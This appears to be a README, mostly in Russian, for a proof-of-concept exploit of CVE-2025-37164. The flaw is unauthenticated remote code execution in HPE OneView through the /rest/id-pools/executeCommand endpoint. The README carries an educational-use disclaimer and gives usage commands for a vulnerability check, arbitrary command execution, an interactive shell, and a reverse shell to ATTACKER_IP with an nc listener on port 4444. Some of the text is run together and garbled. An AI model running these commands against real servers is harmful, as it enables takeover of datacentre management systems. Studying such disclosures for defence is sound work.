
Доказательство концепции эксплуатации для CVE-2025-37164 — критической уязвимости удалённого выполнения кода без аутентификации в HPE OneView через конечную точку /rest/id-pools/executeCommand.
Эксплойт Proof-of-Concept для CVE-2025-37164 — критической (CVSS 10.0) уязвимости неаутентифицированного удалённого выполнения кода в HPE OneView.
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.
Технический анализ: Уязвимость присутствует в эндпоинте PUT /rest/id-pools/executeCommand, который не требует аутентификации и передаёт вводимые пользователем данные напрямую в .
Runtime.exec()requests (pip install requests)# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444